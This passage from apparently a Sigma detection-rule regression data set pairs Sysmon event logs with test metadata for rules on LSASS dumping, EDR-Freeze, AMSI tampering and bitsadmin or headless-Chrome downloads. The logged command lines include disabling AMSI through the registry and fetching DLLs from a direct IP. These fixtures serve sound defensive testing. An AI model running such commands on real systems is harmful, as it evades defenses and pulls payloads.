"Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:50:20.576", "ProcessGuid": "5AA13A44-10B3-68FC-4E1E-000000004002", "ProcessId": 2956, "Image": "C:\\Windows\\system32\\taskmgr.exe", "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP", "CreationUtcTime": "2025-10-24 23:50:20.576", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml ================================================ id: 55db307d-4a36-4594-bea8-7d114714d3b4 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 69ca12af-119d-44ed-b50f-a47af0ebc364 title: LSASS Process Memory Dump Creation Via Taskmgr.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx ================================================ FILE: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 7, "Version": 3, "Level": 4, "Task": 7, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-02-04T08:43:28.342637Z" } }, "EventRecordID": 715282, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 776, 
"ThreadID": 4352 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2026-02-04 08:43:28.234", "ProcessGuid": "14207D89-06B0-6983-CF01-000000004402", "ProcessId": 6672, "Image": "C:\\Users\\SwachchhandaP\\Downloads\\fsquirt.exe", "ImageLoaded": "C:\\Users\\SwachchhandaP\\Downloads\\bthprops.cpl", "FileVersion": "-", "Description": "-", "Product": "-", "Company": "-", "OriginalFileName": "-", "Hashes": "MD5=221877743CF329314E571E9398EFCA70,SHA256=863390BB749E466975A6A5330CCD077C846E1F387AAE0327AFFE33DF87153E67,IMPHASH=7FF91A855D5B3D338EB5B4CE63698F4A", "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable", "User": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/info.yml ================================================ id: 8ee57597-baba-46bd-8a61-85ff51f7aab6 description: N/A date: 2026-02-04 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde title: System Control Panel Item Loaded From Uncommon Location regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.evtx ================================================ FILE: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 7, 
"Version": 3, "Level": 4, "Task": 7, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-27T07:57:32.309580Z" } }, "EventRecordID": 676402, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4264 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-11-27 07:57:32.308", "ProcessGuid": "0197231E-046C-6928-160C-000000000D00", "ProcessId": 296, "Image": "C:\\Users\\Public\\wsass\\WerFaultSecure.exe", "ImageLoaded": "C:\\Windows\\System32\\dbgcore.dll", "FileVersion": "10.0.26100.7019 (WinBuild.160101.0800)", "Description": "Windows Core Debugging Helpers", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "DBGCORE.DLL", "Hashes": "SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C", "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/info.yml ================================================ id: bc1c627e-6529-459d-9bd6-74ffb88b3320 description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 416bc4a2-7217-4519-8dc7-c3271817f1d5 title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.evtx ================================================ FILE: 
regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 10, "Version": 3, "Level": 4, "Task": 10, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-27T07:57:32.317336Z" } }, "EventRecordID": 676404, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4264 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-11-27 07:57:32.315", "SourceProcessGUID": "0197231E-046C-6928-160C-000000000D00", "SourceProcessId": 296, "SourceThreadId": 5260, "SourceImage": "C:\\Users\\Public\\wsass\\WerFaultSecure.exe", "TargetProcessGUID": "0197231E-2DD5-691E-0C00-000000000D00", "TargetProcessId": 860, "TargetImage": "C:\\WINDOWS\\system32\\lsass.exe", "GrantedAccess": "0x1fffff", "CallTrace": "C:\\WINDOWS\\SYSTEM32\\ntdll.dll+16bcc4|C:\\WINDOWS\\SYSTEM32\\ntdll.dll+17aee0|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+7f7dc|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+c8d28|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+44c34|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+48f2c|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+3d414|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+29c7c|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+2a1f0|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+4f894|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+3a64|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+2576|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+20c9|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+1a0b|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+48cc|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+f17ac", "SourceUser": 
"swachchhanda\\xodih", "TargetUser": "NT AUTHORITY\\SYSTEM" } } } ================================================ FILE: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/info.yml ================================================ id: f0a580dc-386c-4049-8ca4-cef9f956dc4c description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 9f5c1d59-33be-4e60-bcab-85d2f566effd title: Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.evtx ================================================ FILE: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 10, "Version": 3, "Level": 4, "Task": 10, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-27T07:22:22.033828Z" } }, "EventRecordID": 445923, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4264 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-11-27 07:22:22.031", "SourceProcessGUID": "0197231E-FC2D-6927-810B-000000000D00", "SourceProcessId": 7224, "SourceThreadId": 4144, "SourceImage": "C:\\Windows\\System32\\WerFaultSecure.exe", "TargetProcessGUID": "0197231E-2DD8-691E-4D00-000000000D00", "TargetProcessId": 3472, 
"TargetImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25100.9008-0\\MsMpEng.exe", "GrantedAccess": "0x1fffff", "CallTrace": "C:\\WINDOWS\\SYSTEM32\\ntdll.dll+1284|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+185c4|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+4fe50|C:\\Windows\\System32\\dbgcore.DLL+164cc|C:\\Windows\\System32\\dbgcore.DLL+23e6c|C:\\Windows\\System32\\dbgcore.DLL+1b230|C:\\Windows\\System32\\dbgcore.DLL+112b4|C:\\Windows\\System32\\dbgcore.DLL+117a8|C:\\Windows\\System32\\WerFaultSecure.exe+115a4|C:\\Windows\\System32\\WerFaultSecure.exe+6a9c|C:\\Windows\\System32\\WerFaultSecure.exe+7378|C:\\Windows\\System32\\WerFaultSecure.exe+834c|C:\\Windows\\System32\\WerFaultSecure.exe+2748|C:\\Windows\\System32\\WerFaultSecure.exe+27e4|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+8740|C:\\WINDOWS\\SYSTEM32\\ntdll.dll+d4464", "SourceUser": "swachchhanda\\xodih", "TargetUser": "NT AUTHORITY\\SYSTEM" } } } ================================================ FILE: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/info.yml ================================================ id: bd66a891-01c3-40b6-aafd-5c1676b44cf3 description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c title: Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": 
{ "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-25T14:30:27.369114Z" } }, "EventRecordID": 16094, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-25 14:30:27.352", "ProcessGuid": "0197231E-4A83-694D-9E0E-000000000800", "ProcessId": 14144, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.26100.1 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "\"C:\\WINDOWS\\system32\\reg.exe\" add \"HKCU\\Software\\Microsoft\\Windows Script\\Settings\" /v AmsiEnable /t REG_DWORD /d 0 /f", "CurrentDirectory": "C:\\WINDOWS\\system32\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000", "LogonId": "0x3144c", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "MD5=573EB13AC2BA31E9C2E17FB6DAD14154,SHA256=E295E776FD4F7F73DFAAA5698A19EA7A2F4A2F0C5E1681FAC94E45D00296C926,IMPHASH=A26BCB048DF34CBB422F2656F38634D0", "ParentProcessGuid": "0197231E-EC48-694C-AA0C-000000000800", "ParentProcessId": 12456, "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/info.yml ================================================ id: 242d26e0-1ce5-4a34-960d-144f34f60e37 description: 
N/A date: 2025-12-25 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981 title: Windows AMSI Related Registry Tampering Via CommandLine regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-10T04:33:20.562782Z" } }, "EventRecordID": 18463, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-10 04:33:20.557", "ProcessGuid": "0197231E-F810-6938-B710-000000000800", "ProcessId": 7732, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "FileVersion": "7.8.26100.1 (WinBuild.160101.0800)", "Description": "BITS administration utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "bitsadmin.exe", "CommandLine": "bitsadmin /transfer n https://www.atomicredteam.io/atomic-red-team/atomics/T1218.011 hello.html", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": 
"0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30", "ParentProcessGuid": "00000000-0000-0000-0000-000000000000", "ParentProcessId": 14736, "ParentImage": "-", "ParentCommandLine": "-", "ParentUser": "-" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml ================================================ id: 83c4dfac-7b5b-4a0e-803e-cca15c933c5e description: N/A date: 2025-12-10 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede title: File Download Via Bitsadmin regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-10T04:44:13.414345Z" } }, "EventRecordID": 18552, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" 
} } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-10 04:44:13.371", "ProcessGuid": "0197231E-FA9D-6938-D910-000000000800", "ProcessId": 9532, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "FileVersion": "7.8.26100.1 (WinBuild.160101.0800)", "Description": "BITS administration utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "bitsadmin.exe", "CommandLine": "bitsadmin /transfer n https://12.34.45.67/calc.dll C:\\Users\\Public\\calc.dll", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30", "ParentProcessGuid": "00000000-0000-0000-0000-000000000000", "ParentProcessId": 14736, "ParentImage": "-", "ParentCommandLine": "-", "ParentUser": "-" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml ================================================ id: 3e393301-93d2-4759-b4d6-b957bdc0ae32 description: N/A date: 2025-12-10 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 99c840f2-2012-46fd-9141-c761987550ef title: Suspicious Download From Direct IP Via Bitsadmin regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.json 
================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-10T04:47:28.250802Z" } }, "EventRecordID": 18580, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-10 04:47:28.224", "ProcessGuid": "0197231E-FB60-6938-DD10-000000000800", "ProcessId": 8924, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "FileVersion": "7.8.26100.1 (WinBuild.160101.0800)", "Description": "BITS administration utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "bitsadmin.exe", "CommandLine": "bitsadmin /transfer n https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1047/bin/calc.dll C:\\Users\\Public\\Music\\calc.dll", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30", "ParentProcessGuid": "00000000-0000-0000-0000-000000000000", "ParentProcessId": 14736, "ParentImage": "-", "ParentCommandLine": "-", "ParentUser": "-" } } } ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml ================================================ id: 4788a4ef-6b50-4b68-9d10-d5471bd5fa02 description: N/A date: 2025-12-10 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c title: Suspicious Download From File-Sharing Website Via Bitsadmin regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-10T04:22:10.216650Z" } }, "EventRecordID": 18325, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-10 04:22:10.201", "ProcessGuid": "0197231E-F572-6938-8B10-000000000800", "ProcessId": 13808, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "FileVersion": "7.8.26100.1 (WinBuild.160101.0800)", "Description": "BITS administration utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": 
"bitsadmin.exe", "CommandLine": "bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll", "CurrentDirectory": "C:\\Program Files\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30", "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", "ParentProcessId": 14736, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml ================================================ id: 7149a708-0d83-4917-8478-24e682260b6f description: N/A date: 2025-12-10 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200 title: File With Suspicious Extension Downloaded Via Bitsadmin regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, 
"EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-10T04:29:18.813904Z" } }, "EventRecordID": 18412, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-10 04:29:18.786", "ProcessGuid": "0197231E-F71E-6938-AE10-000000000800", "ProcessId": 4432, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "FileVersion": "7.8.26100.1 (WinBuild.160101.0800)", "Description": "BITS administration utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "bitsadmin.exe", "CommandLine": "bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\Users\\Public\\calc.dll", "CurrentDirectory": "C:\\Program Files\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30", "ParentProcessGuid": "00000000-0000-0000-0000-000000000000", "ParentProcessId": 14736, "ParentImage": "-", "ParentCommandLine": "-", "ParentUser": "-" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml ================================================ id: 5e620f3d-549d-4515-ae46-981d30ac4683 description: N/A date: 2025-12-10 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 2ddef153-167b-4e89-86b6-757a9e65dcac title: File Download Via Bitsadmin To A Suspicious Target Folder 
regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:20:06.319147Z" } }, "EventRecordID": 32822341, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:20:06.307", "ProcessGuid": "5AA13A44-ACA6-68FE-DE5D-000000004002", "ProcessId": 9184, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "FileVersion": "141.0.7390.123", "Description": "Google Chrome", "Product": "Google Chrome", "Company": "Google LLC", "OriginalFileName": "chrome.exe", "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --headless --enable-logging --disable-gpu --dump-dom \"http://10.0.1.14/nas.txt\"", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", 